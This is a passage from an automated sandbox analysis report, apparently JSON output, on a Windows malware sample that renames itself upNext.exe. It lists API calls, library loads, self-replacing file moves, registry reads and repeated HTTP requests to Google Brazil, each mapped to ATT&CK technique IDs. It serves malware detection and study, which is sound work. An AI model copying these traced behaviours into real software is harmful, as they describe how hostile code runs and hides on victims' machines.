parameter CoInitializeEx (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoAddRefServerProcess (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoReleaseServerProcess (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoResumeClassObjects (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter CoSuspendClassObjects (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleIconToCursor (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreateFontIndirect (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePictureIndirect (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleLoadPicture (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleTranslateColor (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrame (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter OleCreatePropertyFrameIndirect (UID: 00000000-00004788)\n \"upNext.exe\" called \"GetProcAddress\" with a parameter ConvertStringSecurityDescriptorToSecurityDescriptorW (UID: 00000000-00004788)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter wsock32.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter SHFolder.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.ENU (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.EN (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter olepro32.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004224)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter version.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter wsock32.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter SHFolder.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %LOCALAPPDATA%\\upNext.ENU (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %LOCALAPPDATA%\\upNext.EN (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter olepro32.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-SDDL-L1-1-0.dll (UID: 00000000-00004788)\n \"upNext.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00004788)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"15001600c03e836b@advapi32.dll\"\n \"0e000f00703f836b@advapi32.dll\"\n \"0e000f00cc3f836b@advapi32.dll\"\n \"11001200b447836b@advapi32.dll\"\n \"110012004848836b@advapi32.dll\"\n \"120013008c48836b@advapi32.dll\"\n \"12001300e448836b@advapi32.dll\"\n \"14001500386e836b@advapi32.dll\"\n \"14001500506e836b@advapi32.dll\"\n \"14001500686e836b@advapi32.dll\"\n \"17001800806e836b@advapi32.dll\"\n \"0d000e00986e836b@advapi32.dll\"\n \"11001200a86e836b@advapi32.dll\"\n \"11001200bc6e836b@advapi32.dll\"\n \"0f001000fc6f836b@advapi32.dll\"\n \"140015003c70836b@advapi32.dll\"\n \"140015005470836b@advapi32.dll\"\n \"0c000d009c70836b@advapi32.dll\"\n \"0c000d00ac70836b@advapi32.dll\"\n \"0e000f00bc70836b@advapi32.dll\"\n \"0e000f00cc70836b@advapi32.dll\"\n \"0b000c00dc70836b@advapi32.dll\"\n \"180019001473836b@RPCRT4.dll\"\n \"130014004073836b@RPCRT4.dll\"\n \"140015005473836b@RPCRT4.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"upNext.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"upNext.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-224", "type": 6, "relevance": 1, "name": "Calls an API typically used to move file or directory", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"MoveFileA\" with parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe & C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.del (UID: 00000000-00004224)\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" called \"MoveFileA\" with parameter C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.tmp & C:\\4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe (UID: 00000000-00004224)\n \"upNext.exe\" called \"MoveFileA\" with parameter %LOCALAPPDATA%\\upNext.exe & %LOCALAPPDATA%\\upNext.del (UID: 00000000-00004788)\n \"upNext.exe\" called \"MoveFileA\" with parameter %LOCALAPPDATA%\\upNext.tmp & %LOCALAPPDATA%\\upNext.exe (UID: 00000000-00004788)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77500000\n \"upNext.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 77500000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"4044e30f0188bbc151ea29b345d47e3586028f949905c97dce6e0343f1818462.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LOCALE\"; Key: \"00000409\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:80\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-2", "type": 7, "relevance": 5, "name": "GETs files from a webserver", "description": "\"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-eP0mKBTXTHZs8aBYxAfWiQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:54 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eAU8ca-HdQrwjFMs9w4lGgc63cFiXkqq6DZa6hD5jGs6izwsWBhZY; expires=Tue\n 05-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=s89czncfFJ4joRTPIK-hN1QFnLdhBia7swp7T8MhLxQkurVg2miLYeJNMQ4xtSbyBDolrzawub86w_qDvZ3sQYinvOAsPVVMpQYOQTJAhoBOv8c-oy6UBvi4sLcCEErfOJD2Lc-fBnD9t_K7Zisy7AVy-jwuiwKUvoQtA1Ljyeb2w8Z2PboeYlyax2xmk2SurszCIGkfPDfrgEs; expires=Fri\n 08-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-VLjiaqHL677V9JMFt5yVew' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:54 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dtkzAFbYcswHvlfIX7JhFPhIeAuU-uU9fssB6LebULcEeNf5CVCQ; expires=Tue\n 05-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=oxYHfQoeDqT4gDr5TQKuAozzMTuaDk1EURrr21skzGL7N3WH57MKGbtpwclS6HixluzsZN0F4qgXUNABB_nzDKNkQsNO9V70SIE6YpRWbuSOm1M2nAmQyM3tpfg3NmkJcBToq9Y47wLMXLysfuSA1R581Cz0t0RIJZsGzD3OvEGdAiwasBrqYaELsTuw7KRSHBxaKCAAi-4bEQ; expires=Fri\n 08-Aug-2025 09:12:54 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-wG1iKxMWIb-vHIXECheTrg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:55 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2e_Js_ayv96k27APxOlu5JV5ovlJI0FMXpfg1hblrywJ49BGcvGeNw; expires=Tue\n 05-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=x-6bN9x6pNdfQs8I0RL2pPVZY8BbzqPUVisiiXvzubsGVDMVBJ3VE7QKhXFf8PglWTuNaqaCit4Cit6WSpL8MhVq6PJWOykraD5obo0MST5pdavueOA4HZHh_qhSGgEBKABPZegdyT1u_CQ3hVKzReGroRraKYVy5hIUqHGy0atX6d-GvS__3xNSqpIiWoXRTd_LoTFzqTpKTA; expires=Fri\n 08-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-jsQVNcQa5K8dAdmF66wZig' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:55 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2d2wxUoHdYKXTsAETp5HCaha2MLczMl4IsX3LngZwdtkboDK_UjoqQ; expires=Tue\n 05-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=cVM2wPmqB5IJtf4STJfwaqCGbe1x8lpqmT82Df_sDsS_cghEM70LkbOkPXwRAft1pW6pcgJsJZi4xteir8QnIvxJSjjUBxFgp3gbOsZ6vK9qiQTsi2UEQzNZ6VFXFaMmS9Dgwl0dFzwvwXG275-NPn00LTdEmzqoo_LIiKNNQXTs-u3MspMDe0pBv9U669iGegg8E-Edo7GdPg; expires=Fri\n 08-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-M1tFoUeIRvnkCGpoaLL_yg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:55 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2doTVti67ETz7EsAG3phNpNSe6vax4fZ92ayR-3-_WcOQZpTMJd1q8; expires=Tue\n 05-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=iKdxv3XCew5lNtTBP5g5J91ex4u7GtRQplSRJsSML4GRDsXWxRYak6R2xWproYkIKF3wdyFoZz0LrhRGAotE7X0Cx6LgCnF2E6RL2HY0CppOyqPBzJCEPwkVNdTeIeaAcyWAiYIHrvFDTgqThVyKdOSYEyNDygftMcmK9qO-4ZOZuWTSP4AI8lWWg22cGcUSNMNhQ09xwsIaqA; expires=Fri\n 08-Aug-2025 09:12:55 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-sEN6wxjtJjgKoX7xoQmWDw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:56 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2dDfMWDHq7G8Kyt4R_nm6Nhg_OIxyQQcNIHQiaZMIZ9y4Penxbba_A; expires=Tue\n 05-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=JaxNnnst6q2x2PGY6rms0muYBsq69HG0LSLhBN6z5s37J4VILfIfz0upnTnUHTkxtswz-qvH-YyGTp5rfOGeIsH1OvVW_08GNT3Ld8qyeZMqSLnDTuZOHFZhSH-2ECdf5KbAJpSZw8firke0ab3T7FaTyD-SdFd2USPyTB0dchlIgG8FRo3l8JDrHNAK0pdGJG1Gb7DnKdaat0E; expires=Fri\n 08-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-983ge3ZNmZyTNwbmLhpU4Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:56 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eJw_5t7WaFUh_n0OQnM1unzkAy7KO9obGCUXnPD4xh8uYyxWA2plo; expires=Tue\n 05-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=TrCoesyZ5Wt9Vq9CEVT9r5GIFqdGoQZleMb3yhjNsQbeXJ_hgeJ3ZQjYgAtsSO4bsjmJodlhjOoMalhyNvcfGfqOOoKM_Jddyi8u-hBgBreywLDmPttYLe5n8NqQEh641KiZixaBXNJHVbwoKXCSEwRRGrWzMzaX6-622uyyNHSkwhR9AmizWoLrgp6nnvY2dGzMM2AXCmaK6Gg; expires=Fri\n 08-Aug-2025 09:12:56 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-1PV0gJUc5Kwlu66vd71ZcA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:57 GMT\nServer: gws\nContent-Length: 234\nX-XSS-Protection: 0\nX-Frame-Options: SAMEORIGIN\nSet-Cookie: AEC=AVcja2eCEMgeY81GcUa-iDgcWpoP9YJvxScy3e7iqi6x8bnndrkO4W2-WVg; expires=Tue\n 05-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; Secure; HttpOnly; SameSite=lax\nSet-Cookie: NID=521=dPXqRw0HJdv0env_Fe_pWQsWIPBHwC1xPgLNKF-CEju-Gnq3dajleWTTPVcqfLm9bpQfGAKj1HKBpioG12o5Ki3vR0BkagX374zbyCmQT9GTbWgu5z3Gt3M_t_kRSM16mSIec0bttnRB3X6SI2KilmRIu8sSpmY8PL0cWHmXGbSBg7EHri-B4DlddTFPW7vAW4XuMV3oFC9jfA; expires=Fri\n 08-Aug-2025 09:12:57 GMT; path=/; domain=.google.com.br; HttpOnly\nConnection: close with response body ==>3C48544D4C3E3C484541443E3C6D65746120687474702D65717569763D22636F6E74656E742D747970652220636F6E74656E743D22746578742F68746D6C3B63.......\n \"GET / HTTP/1.1\nAccept: */*\nAccept-Language: pt-br;pt;en-us;q=0.5\nUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\nCache-Control: no-cache, must-revalidate\nHost: www.google.com.br\nAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\nConnection: close\" Response ==> HTTP/1.1 302 Found\nLocation: https://www.google.com.br/?gws_rd=ssl\nCache-Control: private\nContent-Type: text/html; charset=UTF-8\nContent-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-CIVvBdR5bvk3zohmN7VKsQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp\nP3P: CP=\"This is not a P3P policy! See g.co/p3phelp for more info.\"\nDate: Thu\n 06 Feb 2025 09:12:57 GMT\nServer: gws\nContent-Length: 